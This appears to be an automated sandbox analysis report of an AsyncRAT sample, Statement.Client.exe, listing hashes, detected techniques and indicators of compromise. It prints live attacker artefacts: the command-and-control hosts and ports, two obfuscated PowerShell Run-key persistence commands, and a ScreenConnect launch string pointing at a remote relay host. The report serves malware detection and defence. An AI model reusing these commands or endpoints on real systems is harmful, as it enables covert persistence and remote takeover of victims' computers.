asyncrat | 72b2d87cf942f3c5dd92927098f59813c86ff94aa7805f82c70fec379a91e371

Analysis

max time kernel
145s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06/12/2024, 16:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Statement.Client.exe
Size

81KB
MD5

096c0bb01099ae31a11f12c4643b02de
SHA1

5fecc71c4991d3bd64142fee92d5dd9cb689743c
SHA256

72b2d87cf942f3c5dd92927098f59813c86ff94aa7805f82c70fec379a91e371
SHA512

52395e5e344cb6ce5e9b92db081c8c5ca240df18917c25ba876793dcee4774b42b80356a6cf47d854a2f5a5179f4ffd0e64cfa79056960b9f479e0e1934b428c
SSDEEP

1536:BoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaWPBJYYb7xJoZ:7enkyfPAwiMq0RqRfbaWZJYYbj0

Score

10^/10

asyncrat default discovery execution persistence rat

Malware Config

Extracted

Family

asyncrat

Version

| Edit by Vinom Rat

Botnet

Default

hegazy.ddns.net:6606

hegazy.ddns.net:7707

hegazy.ddns.net:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detected Nirsoft tools 1 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/3712-530-0x00000000221F0000-0x00000000222D0000-memory.dmp	Nirsoft

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3712-530-0x00000000221F0000-0x00000000222D0000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 12 IoCs

flow	pid	Process
26	1660	powershell.exe
30	4364	powershell.exe
32	2704	powershell.exe
41	3712	msiexec.exe
42	3712	msiexec.exe
44	3712	msiexec.exe
46	3712	msiexec.exe
57	3712	msiexec.exe
59	4700	msiexec.exe
60	4700	msiexec.exe
61	3712	msiexec.exe
66	3712	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1984	powershell.exe
2704	powershell.exe
1660	powershell.exe

Manipulates Digital Signatures 1 TTPs 2 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	Statement.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	Statement.Client.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (242614d5-9b0d-42a9-99bd-6fcc80ac8cc3)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\0LRQ0ZTX.127\\RRHZ5GDM.MZD\\scre..tion_25b0fbb6ef7eb094_0018.0003_8fd1907d7cbc658e\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=242614d5-9b0d-42a9-99bd-6fcc80ac8cc3&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAI%2fpe3r%2bRnk6pVZIMVLn9oAAAAAACAAAAAAAQZgAAAAEAACAAAABx1ir1LnXSnyppGLmKJ8dQnHp4afRjQSV0d5k1LY4EWAAAAAAOgAAAAAIAACAAAADwmrSwBuO%2bsYiVfOzQ1mKV8g6Hs8YV6wM34QWPjnlRWKAEAAA4oTGIdlvHl9PLau6HaGOhU43QwNh6dprpgWr5oiwg3mFrBKvpGdLkBYGF0BgZmzAJm9yJr0Mu7p5iECX7nAwMFydJd7cpmbNzqWeAVeYOayfBJPgYxEimtRSqZvBVCcK%2fkOkz2GYGRSAdluOIv0acKzubnqKSRWC6lIMhYH0%2fWNwoBVpX4APkwZOZ%2fNSz7E7Xfm8FumUSDCB9vLjdf5z3X42a8xj9e%2bOWksNufkBCzgLlyfclrpOO%2fPmXrZk0cYrKprbZHfsSoLuQ9nJ3GnlvlN%2br%2b6u4ZZKtFEo25zRTUxUzjOZEUzqDgJgqI7zQu8oJniUab0SxaXPIgEKvy0hVyMNNI30wzAwMpdxekzmA3bUfApuCQGiLfUdyodgkHKnCP3LjSv5NVsXlZVfgE6V7rK%2fDMhqhtsaUQl%2f3XFJCZhXyVdSGGojjFyGAzojET86AwKOS5cZvelTdsmMOZUu64maJHfU7n0k5dwYzqj5uPyMlVPt%2fEQ%2fbK2dFGLOyfmH42NTi46Tn6s1NH8xCPpxPMeZwHdk4%2bAu6VgGxD30WTeKsmhjAtKLNL47UNX6f38323jSUNwD5Bd0Ra867rQHrDDnthEQ1AJH%2f3FdYOCe3oQ4tPnW1Db5grnabHdqVqswOc3QApZdGACMeE9LJFFanjWW2U8EB48HCrN8X7C%2bIy1shz9%2f0jOdG%2fxeX%2fjfJRhFWpoMRyxCwhT1qBd5JlmeYJFvf02gX3OYiEzVuWqwprPnvN8ju9EXVBl8JaVMX029i9836%2fZC0DOpkDH3stg1oNEK6hmwobFIeMY9yCP%2b%2b95z8I6ORKExTIKahGZhrBj4JmUXjqv8w3DskTA5mpm75z6n5RDgmzLOgC7W8hCdyb7MIZHerKe%2fferGzi5fdT0pLO%2fe0BKFze9gqR%2fjytq0IYBNQFxkX0FzZsGPCJQyl13FLqonRlOJIK7a4H%2bjEauupi6GHzVzXSlmj9qNJJhy2ZrCzlVG6CrJzmWxNmpDHx0nMSdzEGyFBtYDXtfUvzm8Xn7JldNnN6yrMI2B7ej%2bgAS%2beijmKj%2bjxSzElnVfLptJQcOUrHG6Q%2bxgs9oa3%2b76MaJQx4IXb%2fXyzqJgMHhPe7DKrq6qQI3YOKGkw%2fZYp24ZorPiC4SagowFA%2baREpkSUPgMY7uKQiP%2fAWQpxoHBRj2Z6y5U8j9bGpA1DLDm4VCI8l%2bHjE6NGO9mqp2NWD0TGMVjQdTUkJmQq%2bGf1SBwo084ZmKJBM9e6%2fraeF1PgcDypas9vSaF3X9e0yi4zmwxCAinLd5mVryXDBPJUW%2bJL%2fXoRLa255VnlePgldjvEemKtl9vuSf7g%2byizj1aGS%2b1ul9K9h9UQlVUz9hzoCWN78F0ip%2bZ0pCDdTj%2b90Q9s51aH0c3TDQUMC52gw0fKjEq9LwbAzs0HBExti1feE3XhWMHEU87m6f9Vw7KqwedC6l26336fAp0AsUZD0vemBeR42dCtDR10Im%2bn0MB%2fYabKAlvzGvzBgZm7%2fMsS7UqNNXsn730eDiq4ahPj9XVZ2Pf0lMTrBrJL6sfD%2bXgTupC4OqPGN74wWx%2f4vrJtgOLzq0AAAADTokqd%2bfXBWFaI7xwQ2d6uvAVcHp%2fdBCboKsnGx6H2LSeRmueE7sNvot9KQEZ6zmWolJjS60O5SjYPbKaAE819&r=&i=Untitled%20Session\" \"1\""	ScreenConnect.ClientService.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antheraea = "%Abondance% -windowstyle 1 $Cotabulate=(gp -Path 'HKCU:\\Software\\Lascars\\').Svartsiderne;%Abondance% ($Cotabulate)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Meteorologis = "%Craniosacral% -windowstyle 1 $Excerebration=(gp -Path 'HKCU:\\Software\\Believes\\').Indfoejes;%Craniosacral% ($Excerebration)"	reg.exe

Downloads MZ/PE file

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4364	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Intimidity.Alb	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
3712	msiexec.exe
4700	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
4364	powershell.exe
3712	msiexec.exe
1984	powershell.exe
4700	msiexec.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\ScreenConnect\24.3.7.9067\hVqvsfdxfEibrun.cmd	ScreenConnect.ClientService.exe

Executes dropped EXE 6 IoCs

pid	Process
3356	ScreenConnect.WindowsClient.exe
4232	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
704	ScreenConnect.WindowsClient.exe
756	ScreenConnect.WindowsClient.exe
796	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
4232	ScreenConnect.ClientService.exe
4232	ScreenConnect.ClientService.exe
4232	ScreenConnect.ClientService.exe
4232	ScreenConnect.ClientService.exe
4232	ScreenConnect.ClientService.exe
4232	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe
512	ScreenConnect.ClientService.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
2168	3320	WerFault.exe	83
1932	4700	WerFault.exe	130

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Statement.Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_777a2c14525b0976\appid = 68747470733a2f2f7365637572652e746f6465736b2e68656c702f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32342e332e372e393036372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
